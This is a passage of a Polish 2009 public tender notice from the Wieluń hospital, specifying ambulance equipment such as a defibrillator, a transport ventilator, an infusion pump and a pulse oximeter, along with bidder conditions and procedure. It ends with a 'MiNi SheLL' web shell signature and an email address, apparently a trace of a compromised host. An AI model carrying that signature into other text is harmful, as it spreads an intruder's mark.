	automatyczna kompensacja prądowa lub napięciowa impedancji ciała pacjenta przy defibrylacji z łyżek zewnętrznych i elektrod samoprzylepnych;		
	pełne sterowanie za pomocą przycisków lub pokręteł na łyżkach defibrylacyjnych (wybór energii, ładowanie, wyzwolenie wstrząsu, wydruk);		
	kardiowersja;		
	stymulacja zewnętrzna z trybem pracy sztywnym i na żądanie, w komplecie kabel do stymulacji;		
	prąd stymulacji regulowany w zakresie co najmniej 10 do 140 mA;		
	częstość impulsów regulowana w zakresie co najmniej 40 do 170 imp./min.;		
	3 odprowadzeniowe monitorowanie EKG - w komplecie kabel do monitorowania;		
	ekran EL zapewniający dobrą widoczność pod różnym kątem w warunkach silnego oświetlenia;		
	przekątna ekranu min. 5;		
	zasilanie defibrylatora i ładowanie akumulatora/ów z instalacji karetkowej12V jako integralna cześć aparatu		
	zasilanie defibrylatora i ładowanie akumulatora/ów z sieci 230V jako integralna część aparatu lub dodatkowy moduł;		
	akumulator/y bez efektu pamięci  z możliwością doładowywania w aparacie bez konieczności pełnego rozładowywania .		
	deklaracje zgodności, certyfikat CE oraz wpis do rejestru wyrobów medycznych - załączyć do oferty;		
8.	RESPIRATOR  TRANSPORTOWY 
(podać markę i model, załączyć folder)		
	Respirator do terapii oddechowej w trakcie transportu, 
Zasilanie pneumatyczne z przenośnego lub stacjonarnego źródła tlenu o ciśnieniu min. 3,5 - 6,0  bar,
Niskie zużycie tlenu do sterowania pracą respiratora 
Max 20 ml/cykl oddechowy 
Maksymalna waga (bez butli)  3 kg		
	Tryb wentylacji:
IPPV (CMV) 
Tryb CMV/Demand - blokada cyklu automatycznego w przypadku wykrycia oddechu spontanicznego
Wentylacja bierna (na żądanie) 100% tlenem (integralna funkcja respiratora) z przepływem zależnym od podciśnienia w układzie pacjenta
		
	Płynna, zintegrowana regulacja objętości i częstości oddechowej, 
Zakres regulacji parametrów wentylacji umożliwiający wentylację zastępczą dorosłych i dzieci, 
Objętość oddechowa min. 300-1400 ml, 
Częstość oddechowa Min. 9-20 /min, 
Ograniczenie ciśnienia szczytowego w układzie pacjenta na poziomie max 40 cmH2O   (zastawka bezpieczeństwa), 
Regulowane ciśnienie końcowo-wydechowe (PEEP) w zakresie min 2,5 10 cmH2O, 
Minimum dwa poziomy stężenia tlenu w mieszaninie oddechowej 100% i max 50% 
czułość wyzwalania zastawki (na żądanie) max.  - 2 cm H2O, 
Przepływ w trybie Demand zależny od podciśnienia,		
	Zegarowy manometr ciśnienia w układzie pacjenta o minimalnym zakresie skali od -10 do 100 cm H2O		
	Alarm wysokiego ciśnienia szczytowego w układzie pacjenta, 
Wskaźnik niskiego ciśnienia gazu zasilającego,		
	Układ pacjenta silikonowy, do sterylizacji w autoklawie, długość min. 120 cm 
Przewód zasilający zakończony wtykiem szybkozłącza AGA, długość min. 120 cm,		
	Respirator zgodny z wymogami normy EN 794-3 
odporność na działanie wody minimum klasa IPX4 		
	Wymagane wyposażenie minimalne zestawu tlenowego:
torba transportowa z kieszeniami i uchwytami do mocowania drobnego sprzętu medycznego, umożliwiająca transport zestawu w ręku, na ramieniu i na plecach, z uchwytami umożliwiającymi zawieszenie zestawu na ramie noszy / łóżka
butla tlenowa aluminiowa 2,7 l O2,  400 l O2 przy ciśnieniu 150 atm, możliwość napełniania do 200 atm
reduktor tlenowy z gniazdem AGA O2 i przepływomierzem obrotowym 0-25 l/min, ciśnienie robocze 200atm, przepływ z gniazda AGA powyżej 120l/min., manometr w osłonie zabezpieczającej przed uszkodzeniem		
	Uchwyt do zamocowania respiratora na ścianie ambulansu		
	Deklaracja zgodności , certyfikat CE , wpis do rejestru wyrobów medycznych na oferowany respirator - załączyć do oferty.
9.	PULSOKSYMETR PRZENOŚNY 
(podać markę i model , załączyć folder i deklarację zgodności CE)
	z pomiarem saturacji i pulsu
	z alarmami i funkcja pamięci
	z wyświetlaczem cyfrowym saturacji i pulsu
	ze wskaźnikiem jakości sygnału pulsu
	z zasilaniem bateryjnym lub akumulatorowym, czas pracy ciągłej około 100 godziny na zasilaniu bateryjnym lub akumulatorowym
	z czujnikami wielokrotnego użytku typu klips dla dorosłych i dla dzieci;
	z pokrowcem ochronnym na pulsoksymetr i akcesoria 
	załączyć deklarację zgodności i certyfikat oraz zgłoszenie do rejestru wyrobów medycznych 
10.	POMPA   INFUZYJNA 
(podać markę i model, załączyć folder)
	jednostrzykawkowa, przeznaczona do precyzyjnego dozowania leków i płynów infuzyjnych podczas transportu dorosłych oraz dzieci,
	zasilanie akumulatorowe oraz sieciowe z instalacji 230V i 12 V w ambulansie ,w komplecie ze wszystkimi akcesoriami do zasilania,
	czas pracy z akumulatora min. 15 h przy 5ml/h,
	możliwość stosowania strzykawek krajowych i zagranicznych o różnych rozmiarach,
	automatyczne rozpoznawanie strzykawki,
	funkcja bolus umożliwiająca szybkie i wielokrotne podawanie pacjentowi dawki uderzeniowej |o precyzyjnie ustawionej objętości w dowolnie wybranym momencie infuzji,
	bolus automatyczny i manualny,
	programowana szybkość podawania bolusa,
	możliwość zmiany parametrów bolusa w trakcie trwania infuzji,
	programowany próg ciśnienia okluzji - min. 3 poziomy,
	automatyczna redukcja bolusa okluzyjnego
	możliwość zmiany progu ciśnienia okluzji bez przerywania infuzji,

	historia infuzji,
	biblioteka nazw leków - możliwość zapamiętywania w pompie nazw leków,
	strzykawka montowana od czoła pompy,
	rama pompy nie może wysuwać się poza obudowę pompy,
	dźwiękowe i optyczne sygnalizowanie sytuacji wymagających interwencji personelu,
	napisy na wyświetlaczu w języku polskim,
	waga do 3 kg,
	uchwyt do przenoszenia pompy,
	zasilanie pompy mocowanej na statywie za pomocą standardowego kabla sieciowego (a nie dodatkowego zasilacza),
	uchwyt zgodny w wymogami normy PN EN 1789 posiadający funkcje zasilania pompy i ładowania akumulatora po wpięciu urządzenia do uchwytu (podać markę i model załączyć folder i potwierdzenie przeprowadzenia badań wytrzymałościowych)
11.	MATERAC  PRÓŻNIOWY
(podać markę i model, załączyć folder)
12.	PŁACHTA  LUB  MATERAC  DO PRZENOSZENIA   PACJENTA
(podać markę i model , załączyć folder)
13.	KAPNOMETR
(podać markę i model , załączyć folder).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 34.13.61.00-0, 50.11.71.00-9, 34.11.41.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy potwierdzający spełnienie warunków: 1. Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 2. Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia; lub którzy przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. 3 .Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. 4. Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia. 5. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenia lub dokumenty złożone przez Wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna...</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 2) Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych. 3) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 Prawa zamówień publicznych. 4) Informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 5) Polisa, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności. 6) Oświadczenie, że oferowane produkty spełniają właściwe dla każdego z nich wymogi jakościowe czego potwierdzeniem są certyfikaty i atesty Urzędu Rejestracji Produktów Leczniczych , Wyrobów Medycznych i Produktów Biobójczych, dopuszczające oferowane produkty do obrotu i stosowania w służbie zdrowia na terenie RP (do wglądu na każde żądanie Zamawiającego) . 7) Świadectwo homologacji na pojazd bazowy 8) Świadectwo homologacji na ambulans 9) Folder ambulansu i sprzętu medycznego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital.powiat.wielun.pl..<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Na wniosek Wykonawcy Specyfikację istotnych warunków zamówienia można uzyskać w Dziale OiZP pokój 204 - nieodpłatnie..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2009 godzina 10:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej w Wieluniu, ulica Szpitalna 16 , 98 - 300 Wieluń - SEKRETARIAT POKÓJ nr 216..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com